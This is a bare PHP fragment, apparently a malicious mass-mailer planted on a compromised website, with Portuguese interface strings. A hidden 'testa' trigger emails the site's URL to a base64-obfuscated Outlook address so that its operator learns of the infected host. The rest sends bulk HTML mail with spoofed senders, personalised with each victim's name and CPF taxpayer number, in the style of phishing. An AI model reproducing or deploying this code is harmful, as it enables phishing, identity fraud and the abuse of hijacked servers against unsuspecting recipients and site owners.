if(isset($_GET['testa'])){ $email = base64_decode('YWRhb2Nvc3RhMzlqcnBhZWtAb3V0bG9vay5jb20='); $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $envio = mail("$email","[v] http://$target","http://$target"); if($envio) { echo '<span style="font-family: monospace;">[+] FOI</span>
'; } else { echo '<span style="font-family: monospace;">[-] N?</span>
'; }}$testa = $_POST['veio'];if($testa != "") { $message = $_POST['html']; $subject = $_POST['assunto']; //$nome = $_POST['nome']; $de = $_POST['de']; $to = $_POST['emails']; $host = "<font color='#FFFFFF'>".$_SERVER["HTTP_HOST"]." </font>"; $email = explode("\n", $to); $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $aux = explode(';',$email[$i]); $dataHora = date("d/m/Y h:i:s"); $boundary = rand(0,999999999999); $codig = " - ( $boundary\n )"; $EmailTemporario = $aux[0]; $message = stripslashes($message); $rnd = rand(10000000, 99999999); $msgy = str_replace("%email%", $EmailTemporario, $message); $msgx = str_replace("%rand%", $rnd, $msgy); $msgz = str_replace("%nome%", $aux[1], $msgx); $msga = str_replace("%cpf%", $aux[2], $msgz); $msgb = str_replace("%nome%", $aux[1], $subject); $de = str_replace("%rand%", $rnd, $de); $headers = "MIME-Version: 1.0\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\n"; $headers .= "From: ".$nome." <".$de.">\r\n"; if(mail($EmailTemporario, $msgb.$codig, $msga.$dataHora, $headers)) echo '<font color=blue>( $count ) <font color=black>transformou '.($i+1).' </font><email>'.$email[$i].'</email>
<hr>'; else echo '<font color=black>( $count ) <font color=red>nao vem info '.($i+1).' </font><email>'.$email[$i].'</email>
<hr>'; $i++; $count++; } $count--; echo "[Fim do Envio]"; if($ok == "ok") echo "[Fim do Envio]"; }